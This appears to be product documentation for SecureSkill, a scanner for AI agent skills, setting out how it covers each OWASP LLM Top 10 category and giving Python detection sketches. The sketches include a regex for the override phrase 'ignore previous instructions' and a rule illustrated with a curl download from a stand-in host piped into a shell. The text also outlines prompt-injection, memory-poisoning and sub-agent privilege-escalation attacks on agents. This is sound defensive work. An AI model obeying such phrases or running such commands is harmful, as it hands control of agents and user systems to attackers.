Framework Alignment

OWASP LLM Top 10 Alignment

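The OWASP Top 10 for LLM Applications is a widely referenced security framework for large language model applications. The sections below show how SecureSkill's multi-layer scan pipeline aligns with each category, along with the coverage level (Full or Partial), the relevant attack categories, and the pipeline layers involved.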

LLM01: Prompt Injection

Coverage: Full

Manipulating LLMs via crafted inputs can lead to unauthorized access, data breaches, and compromised decision-making.

Attack Categories

prompt_injection_direct, prompt_injection_indirect, scanner_evasion

Pipeline Layers

AI Semantic Analysis, Pattern Matching, Deobfuscation Engine

How SecureSkill Detects It

Core strength. Two dedicated attack categories cover direct injection (explicit overrides, role reassignment, "ignore previous instructions") and indirect injection (hidden instructions in documentation, assets, and template files loaded into context). AI semantic analysis examines every file in the skill package for injection patterns. Scanner evasion detection specifically catches meta-injection targeting security tools. The deobfuscation engine strips Unicode tricks that could hide injection payloads.
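As a rough illustration of how deobfuscation and pattern matching can work together, the Python sketch below removes a few invisible code points, applies NFKC normalization, and then checks for a single override phrase. The character set, the regular expression, and the function names are assumptions made for this example; they are not SecureSkill's actual rules.

```python
import re
import unicodedata

# Hypothetical, deliberately small set of invisible code points.
INVISIBLE = {"\u200b", "\u200c", "\u200d", "\u2060", "\ufeff"}

# Hypothetical example rule for one direct-injection phrase.
OVERRIDE = re.compile(r"ignore\s+(?:all\s+)?previous\s+instructions", re.IGNORECASE)

def deobfuscate(text: str) -> str:
    """Drop invisible characters, then fold compatibility forms such as fullwidth letters."""
    visible = "".join(ch for ch in text if ch not in INVISIBLE)
    return unicodedata.normalize("NFKC", visible)

def has_direct_injection(text: str) -> bool:
    """Report whether the override phrase appears once the text is deobfuscated."""
    return OVERRIDE.search(deobfuscate(text)) is not None
```

Normalizing before matching means a phrase split by a zero-width space or written in fullwidth letters is compared in the same form as its plain-ASCII equivalent.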

LLM02: Insecure Output Handling

Coverage: Partial

Neglecting to validate LLM outputs may lead to downstream security exploits, including code execution that compromises systems and exposes data.

Attack Categories

scope_mismatch, malicious_scripts

Pipeline Layers

AI Semantic Analysis, Pattern Matching

How SecureSkill Detects It

SecureSkill scans skill input (what the skill instructs the agent to do), not runtime output (what the agent actually produces). However, scope mismatch and malicious script detection catch skills that instruct agents to produce dangerous outputs such as code execution, file writes to system paths, or network calls with embedded data.

Full LLM02 coverage requires runtime output validation. SecureSkill detects dangerous output instructions at the skill level, but cannot monitor what the agent actually produces during execution.

LLM03: Training Data Poisoning

Coverage: Partial

Tampered training data can impair LLMs, leading to responses that may compromise security, accuracy, or ethical behavior.

Attack Categories

memory_poisoning, persistence_via_promotion

Pipeline Layers

AI Semantic Analysis, Pattern Matching

How SecureSkill Detects It

Memory poisoning detection catches skills that seed persistent memory files with manipulated data, effectively poisoning the agent's context across sessions. Promotion detection flags instructions that inject hidden content into persistent agent config files, altering future behavior. Pattern matching rules detect workspace and context poisoning signatures.

SecureSkill addresses agent-level context poisoning (persistent memory, workspace files). Base model training data poisoning is outside the scope of pre-installation skill scanning.

LLM04: Model Denial of Service

Coverage: Partial

Overloading LLMs with resource-heavy operations can cause service disruptions and increased costs.

Attack Categories

resource_abuse, scope_mismatch, obfuscation

Pipeline Layers

AI Semantic Analysis, Pattern Matching, Deobfuscation Engine

How SecureSkill Detects It

Resource abuse detection flags skills that perform legitimate operations at disproportionate scale: loops making network requests, excessive subprocess spawning, and API call volumes far exceeding stated purpose. Scope mismatch catches skills that generate excessive context or recursive prompts. Obfuscation detection identifies encoded payloads that could expand to large sizes, consuming disproportionate processing resources.

Direct model-level DoS (e.g., adversarial inputs designed to maximize inference cost) is outside the scope of skill scanning. SecureSkill detects skill-level resource abuse patterns that could lead to service disruption.
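One way to picture the "loops making network requests" check is a small syntax-tree walk. The sketch below uses Python's standard `ast` module to list network calls that appear under a `for` or `while` node. The set of call names and both function names are assumptions for illustration, and the check is far simpler than a production rule.

```python
import ast

# Illustrative call names only; a real rule set would be much broader.
NETWORK_CALLS = {"requests.get", "requests.post", "urllib.request.urlopen"}

def dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None

def network_calls_in_loops(source):
    """Return sorted line numbers of network calls found anywhere under a loop node
    (this includes the loop header as well as the body)."""
    hits = set()
    for loop in ast.walk(ast.parse(source)):
        if isinstance(loop, (ast.For, ast.While)):
            for node in ast.walk(loop):
                if isinstance(node, ast.Call) and dotted_name(node.func) in NETWORK_CALLS:
                    hits.add(node.lineno)
    return sorted(hits)
```

A finding here is only a signal. Whether the volume is disproportionate still depends on the skill's stated purpose, which is where semantic analysis comes in.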

LLM05: Supply Chain Vulnerabilities

Coverage: Full

Depending on compromised components, services, or datasets undermines system integrity, causing data breaches and system failures.

Attack Categories

supply_chain, obfuscation

Pipeline Layers

Pattern Matching, Threat Intelligence, Vulnerability Database, Credential Detection, AI Semantic Analysis, Deobfuscation Engine

How SecureSkill Detects It

Dedicated supply chain detection covers known malicious package patterns, remote script execution at install time, and mutable remote imports. Real-time threat intelligence checks extracted URLs, domains, and file hashes against active threat feeds. Vulnerability database queries identify known-compromised npm and PyPI dependencies by cross-referencing CVE and advisory databases. Credential detection catches embedded secrets from compromised publishers. AI semantic analysis evaluates publisher metadata, dependency declarations, and version history for suspicious indicators.
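To make "remote script execution at install time" concrete, the sketch below inspects the npm lifecycle scripts (`preinstall`, `install`, `postinstall`) in a `package.json` and flags any that pipe a download straight into a shell. The regular expression and the function name are assumptions for this example and cover only one common pattern.

```python
import json
import re

# npm runs these lifecycle scripts automatically during installation.
LIFECYCLE = ("preinstall", "install", "postinstall")

# Hypothetical rule: a curl/wget download piped directly into a shell.
PIPE_TO_SHELL = re.compile(r"\b(?:curl|wget)\b[^|\n]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b")

def risky_install_scripts(package_json: str) -> list[str]:
    """Return the lifecycle script names that download and execute remote code."""
    scripts = json.loads(package_json).get("scripts", {})
    return [name for name in LIFECYCLE if PIPE_TO_SHELL.search(scripts.get(name, ""))]
```

For example, a manifest whose `postinstall` entry is `curl -fsSL https://example.invalid/i.sh | sh` would be reported, while an ordinary `test` script would not.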

LLM06: Sensitive Information Disclosure

Coverage: Full

Failure to protect against disclosure of sensitive information in LLM outputs can result in legal consequences or a loss of competitive advantage.

Attack Categories

credential_harvesting, data_exfiltration

Pipeline Layers

Credential Detection, AI Semantic Analysis, Pattern Matching, AST Analysis, Threat Intelligence

How SecureSkill Detects It

Credential detection scans every file with detectors covering AWS, GCP, Azure, GitHub, and hundreds more services. AI semantic analysis detects instructions to read sensitive files and transmit data externally. Pattern matching rules flag data exfiltration patterns including URL construction with embedded user data, encoded payloads, and network calls with sensitive content. AST-level dataflow tracing follows credential reads from source to network sink. Threat intelligence validates destination URLs against active threat feeds.
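The idea of tracing a credential read from source to network sink can be sketched with Python's `ast` module. The example below is a minimal, flow-insensitive taint check: names assigned from an environment read are marked as tainted, taint spreads through further assignments, and any network call that receives a tainted value is reported. The source and sink lists and all function names are assumptions for illustration, not SecureSkill's implementation.

```python
import ast

# Illustrative sources and sinks; a real analysis would model many more.
SOURCE_CALLS = {"os.getenv", "os.environ.get"}
SINK_CALLS = {"requests.post", "requests.get"}

def dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None

def is_source(node):
    """True for os.getenv(...), os.environ.get(...), or os.environ[...]."""
    if isinstance(node, ast.Call):
        return dotted_name(node.func) in SOURCE_CALLS
    if isinstance(node, ast.Subscript):
        return dotted_name(node.value) == "os.environ"
    return False

def carries_secret(expr, tainted):
    """True if the expression contains a source read or a tainted variable."""
    return any(
        is_source(sub) or (isinstance(sub, ast.Name) and sub.id in tainted)
        for sub in ast.walk(expr)
    )

def find_flows(source: str) -> list[int]:
    """Return line numbers of sink calls that receive environment-derived data."""
    tree = ast.parse(source)
    assigns = [n for n in ast.walk(tree) if isinstance(n, ast.Assign)]
    tainted: set[str] = set()
    changed = True
    while changed:  # iterate to a fixpoint so taint spreads through chains
        changed = False
        for assign in assigns:
            if carries_secret(assign.value, tainted):
                for target in assign.targets:
                    if isinstance(target, ast.Name) and target.id not in tainted:
                        tainted.add(target.id)
                        changed = True
    lines = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Call) and dotted_name(node.func) in SINK_CALLS:
            args = list(node.args) + [kw.value for kw in node.keywords]
            if any(carries_secret(arg, tainted) for arg in args):
                lines.add(node.lineno)
    return sorted(lines)
```

Because the check ignores statement order and control flow, it can over-report. That trade-off keeps the sketch short and errs on the side of flagging.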

LLM07: Insecure Plugin Design

Coverage: Full

LLM plugins processing untrusted inputs and having insufficient access control risk severe exploits like remote code execution.

Attack Categories

skill_injection, malicious_scripts, malicious_hooks, scope_mismatch, file_system_abuse, data_exfiltration, credential_harvesting, obfuscation

Pipeline Layers

AI Semantic Analysis, Pattern Matching, AST Analysis, Credential Detection, Threat Intelligence, Vulnerability Database, Deobfuscation Engine

How SecureSkill Detects It

This is what SecureSkill does. The entire product is a security scanner for agent plugins (skills). All 20+ attack categories collectively evaluate plugin security: scope mismatch, excessive permissions, dangerous code execution, unauthorized data access, credential exposure, file system abuse, and more. Every layer of the pipeline contributes to a comprehensive pre-installation security assessment of the plugin before it can interact with the agent.

LLM08: Excessive Agency

Coverage: Full

Granting LLMs unchecked autonomy to take action can lead to unintended consequences, jeopardizing reliability, privacy, and trust.

Attack Categories

scope_mismatch, tool_scope_manipulation, subagent_abuse

Pipeline Layers

AI Semantic Analysis, Pattern Matching

How SecureSkill Detects It

Scope mismatch detection directly addresses excessive agency by comparing a skill's declared purpose against its actual capabilities and flagging skills that request or exercise permissions far beyond what is needed. Tool scope manipulation catches skills that request tools beyond their stated purpose or attempt to override tool restrictions at runtime. Subagent abuse detection flags skills that spawn sub-agents to bypass parent restrictions or escalate privileges. The permission map output shows exactly what the skill reads, writes, executes, and contacts, making excessive agency visible.
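Comparing declared purpose against actual capabilities amounts to a set difference over a permission map. The sketch below assumes a hypothetical map with the four keys named above (`reads`, `writes`, `executes`, `contacts`); the data shape and the function name are illustrative and do not describe SecureSkill's real output format.

```python
# Hypothetical permission-map shape: the four keys mirror the text above,
# and each value is a collection of paths, commands, or hosts.
KEYS = ("reads", "writes", "executes", "contacts")

def excess_permissions(declared, observed):
    """Return, per key, what the skill was observed to use but never declared."""
    excess = {}
    for key in KEYS:
        extra = set(observed.get(key, ())) - set(declared.get(key, ()))
        if extra:
            excess[key] = sorted(extra)
    return excess
```

A note-taking skill that declares only `reads: ["./notes"]` but is observed reading `~/.ssh/id_rsa` and contacting an external host would yield entries under both `reads` and `contacts`.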

LLM09: Overreliance

Coverage: Partial

Failing to critically assess LLM outputs can lead to compromised decision making, security vulnerabilities, and legal liabilities.

Attack Categories

trust_exploitation, model_safety_bypass

Pipeline Layers

Pattern Matching, AI Semantic Analysis

How SecureSkill Detects It

Trust exploitation detection catches fake approval workflows, authority bias patterns ("IMPORTANT SYSTEM UPDATE"), and social engineering that exploits overreliance on the agent's judgment. Dedicated detection rules target approval fatigue induction, technical jargon masking dangerous operations, and urgency exploitation. The trust signals output provides publisher reputation data to help users make informed trust decisions rather than blindly relying on the agent.

Overreliance is fundamentally a human behavioral risk. SecureSkill detects skills designed to exploit user trust, but cannot prevent users from over-trusting legitimate agent outputs.
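The trust exploitation rules described above can be pictured as a small set of labeled patterns. In the sketch below, the rule names, the regular expressions, and the function name are all assumptions for illustration. Only the "IMPORTANT SYSTEM UPDATE" phrase comes from the description above.

```python
import re

# Hypothetical rules; real detection would combine many more signals.
RULES = {
    "authority_bias": re.compile(
        r"\b(?:IMPORTANT|URGENT|CRITICAL)\s+SYSTEM\s+(?:UPDATE|NOTICE|MESSAGE)\b"
    ),
    "urgency": re.compile(r"\b(?:immediately|right now|without delay)\b", re.IGNORECASE),
    "approval_suppression": re.compile(
        r"\b(?:do not|don't|never)\s+(?:ask|prompt|wait)\b[^.\n]*"
        r"\b(?:confirmation|approval|permission)\b",
        re.IGNORECASE,
    ),
}

def trust_signals(text):
    """Return the sorted names of every rule that matches the text."""
    return sorted(name for name, pattern in RULES.items() if pattern.search(text))
```

Keyword rules like these are easy to evade on their own, which is one reason to pair them with semantic analysis rather than rely on them alone.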

LLM10: Model Theft

Coverage: Partial

Unauthorized access to proprietary large language models risks theft, loss of competitive advantage, and dissemination of sensitive information.

Attack Categories

credential_harvesting

Pipeline Layers

Credential Detection, AI Semantic Analysis, Pattern Matching

How SecureSkill Detects It

Credential detection specifically identifies API keys for model providers (Anthropic, OpenAI, Google, Azure, and hundreds more), which could enable unauthorized model access. AI semantic analysis detects instructions to harvest or exfiltrate model provider credentials. Pattern matching rules flag credential access patterns targeting provider-specific paths and environment variables.

SecureSkill detects credential theft that could enable unauthorized model access. Broader model theft vectors (weight exfiltration, model reverse engineering, side-channel attacks) are outside the scope of skill scanning.
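As a simple picture of flagging access to provider-specific environment variables, the sketch below scans skill files for references to a few commonly used variable names. The list of names, the function name, and the input shape (a mapping of file path to text) are assumptions for this example.

```python
import re

# Commonly used variable names, listed here purely for illustration.
PROVIDER_ENV_VARS = (
    "OPENAI_API_KEY",
    "ANTHROPIC_API_KEY",
    "GOOGLE_API_KEY",
    "AZURE_OPENAI_API_KEY",
)
ENV_REF = re.compile(r"\b(" + "|".join(PROVIDER_ENV_VARS) + r")\b")

def provider_key_references(files):
    """Map each file path to the sorted provider variables it mentions."""
    hits = {}
    for path, text in files.items():
        found = sorted(set(ENV_REF.findall(text)))
        if found:
            hits[path] = found
    return hits
```

A reference alone is not proof of theft, since many legitimate skills read an API key. The finding becomes meaningful when combined with evidence that the value is transmitted elsewhere.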

SecureSkill aligns with the OWASP Top 10 for LLM Applications, providing full coverage for prompt injection, supply chain vulnerabilities, sensitive information disclosure, insecure plugin design, and excessive agency, with partial coverage across the remaining five categories. Coverage is delivered through a multi-layer analysis pipeline: AI semantic analysis across 20+ purpose-built attack categories, comprehensive pattern matching rules, AST-level code analysis, dependency vulnerability scanning, real-time threat intelligence, credential detection, and Unicode deobfuscation.
